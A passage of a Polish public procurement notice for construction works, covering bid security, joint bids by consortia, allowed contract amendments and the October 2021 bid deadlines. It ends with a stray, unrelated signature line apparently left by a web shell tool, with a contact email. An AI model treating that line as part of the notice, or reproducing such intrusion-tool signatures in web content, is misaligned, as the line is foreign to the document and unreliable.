obowiązywania nie krótszym niż termin związania ofertą,<br/>informacje o podmiocie składającym ofertę oraz o przypadkach w których gwarancja lub<br/>poręczenie jest realizowane czyli kiedy wadium zostaje zatrzymane – art. 98 ust. 6 ustawy Pzp.<br/>Złożona gwarancja lub poręczenie musi mieć charakter bezwarunkowy i płatna na pierwsze<br/>żądanie. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.<br/>9. 5 W przypadku wnoszenia wadium w innych niż „pieniądz” formach, wymagane jest<br/>załączenie do oferty oryginalnego dokumentu gwarancji/poręczenia w formie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawieni <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12. 1 Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy. Do oferty<br/>należy załączyć pełnomocnictwo dla ustanowionego pełnomocnika w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>12. 2 Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania: zwraca się do<br/>zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informacje,<br/>korespondencję, itp.<br/>12. 3 Oferta wspólna, składana przez dwóch lub więcej wykonawców, powinna spełniać<br/>następujące wymagania:<br/>1) oferta wspólna powinna być sporządzona zgodnie z SWZ<br/>2) sposób składania oświadczeń i dokumentów w ofercie wspólnej:<br/>a) wykonawcy składają jedną ofertę do której załączone będą dokumenty, o których mowa w<br/>rozdziale 7 SWZ, oświadczenia składa każdy z wykonawców osobno w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lub opatrzonej podpisem zaufanym lub<br/>podpisem osobistym, zgodnie z wytycznymi znajdującymi się w rozdziale 11 SWZ;b) Wykonawca winien przedłożyć dokumenty i oświadczenia wymienione w pkt 7.6 pkt 1) 2) 3)<br/>SWZ dotyczące każdego partnera konsorcjum osobno;<br/>c) oświadczenie, o którym mowa w pkt 7.1 składa każdy z wykonawców osobno;<br/>d) oświadczenia i dokumenty wspólne takie jak np.: oferta cenowa, składa pełnomocnik<br/>wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną;<br/>e) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców<br/>występujących wspólnie;<br/>f) wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z<br/>jej postanowieniami;<br/>g) wszelka korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako<br/>reprezentant (pełnomocnik) pozostałych.<br/>Uwaga: warunki, o których mowa w rozdziale 7 SWZ (warunki uczestnictwa w przetargu)<br/>podmioty składające ofertę wspólną jako konsorcjum mogą spełniać łącznie.<br/>3) przed podpisaniem umowy (w przypadku wygrania przetargu) wykonawcy składający ofertę<br/>wspólną będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum.<br/>12. 4 Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo reprezentowania<br/>Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – dotyczy<br/>tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi<br/>być przedstawione w oryginale lub kopii, której zgodność z oryginałem poświadczono notarialnie<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:<br/>1. Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:<br/>a) w przypadku wystąpienia okoliczności niezależnych od Wykonawcy na jego pisemny<br/>uzasadniony wniosek, pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca<br/>nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona,<br/>b) w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu oraz opóźnienia<br/>Zamawiającego w podpisaniu umowy,<br/>c) w przypadku nieprzekazania Wykonawcy z winy Zamawiającego dokumentów niezbędnych do<br/>wykonania przedmiotu umowy, o ile Zamawiający zobowiązany był do przekazania takich<br/>dokumentów Wykonawcy,<br/>d) w przypadku opóźnień Zamawiającego w zakresie dokonywania odbiorów lub prób<br/>końcowych,<br/>e) wykopalisk lub innych przeszkód uniemożliwiających prowadzenie robót, za które nie<br/>odpowiada Wykonawca,<br/>f) zmian spowodowanych warunkami geologicznymi, archeologicznymi lub terenowymi w<br/>szczególności: niewypały i niewybuchy, wykopaliska archeologiczne nieprzewidziane w SWZ,<br/>g) wystąpienia okoliczności, których obiektywnie nie można było przewidzieć w chwili zawarcia<br/>umowy,<br/>h) zawieszenia robót przez Zamawiającego, z powodów wystąpienia przyczyn technicznych lub<br/>organizacyjnych okresowo uniemożliwiających kontynuowanie wykonania przedmiotu umowy. O<br/>zawieszeniu robót Zamawiający powiadomi Wykonawcę wskazując przyczynę zawieszenia;<br/>i) wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających realizację robót Zamawiający informuje, iż roboty wykonywane będą na zewnątrz. Wykonawca powołując się na<br/>niesprzyjające warunki atmosferyczne powinien wykazać, że warunki pogodowe były nietypowe<br/>dla danej pory roku (np. wystąpiła powódź, huragan, ekstremalne temperatury lub opady itp.).<br/>Jednocześnie Wykonawca powinien tak rozplanować harmonogram plac aby uwzględnić<br/>charakterystyczne dla danej pory roku warunki atmosferyczne;<br/>j) zmian dokumentacji projektowej, dokonanej na wniosek Zamawiającego lub uzasadniony<br/>względami techniczno-projektowymi wniosek Wykonawcy;<br/>k) niezawinionych przez Wykonawcę problemów z uzyskaniem pisemnych oświadczenia<br/>poszczególnych właścicieli posesji, przez które przebiegają sieci kanalizacji sanitarnej o<br/>wyrażeniu zgody na dysponowanie nieruchomością na cele budowlane, zgód na wejście w<br/>teren.<br/>l) przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji<br/>decyzji, zezwoleń koniecznych dla wykonania niniejszej inwestycji itp.,<br/>m) w przypadku konieczności wprowadzenia zmian w dokumentacji projektowej lub<br/>wykonawczej na skutek okoliczności których strony nie mogły obiektywnie przewidzieć w<br/>momencie podpisywania umowy, o czas niezbędny do naniesienia zmian,<br/>n) wstrzymania robót budowlanych z przyczyn niezależnych od Wykonawcy.<br/>2. Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących<br/>przypadkach:<br/>1) zmian mających wpływ na koszty wykonania zamówienia przez Wykonawcę, w przypadku<br/>zmiany:<br/>a) stawki podatku od towarów i usług,<br/>b) rezygnacji z części robót, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji<br/>przedmiotu umowy lub których wykonanie nie będzie konieczne lub będzie bezcelowe w<br/>przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia<br/>umowy – o wartość niewykonanych robót.<br/>3. Inne zmiany zostały wskazane w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">adres skrytki ePUAP: /f9oo3ur19e/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com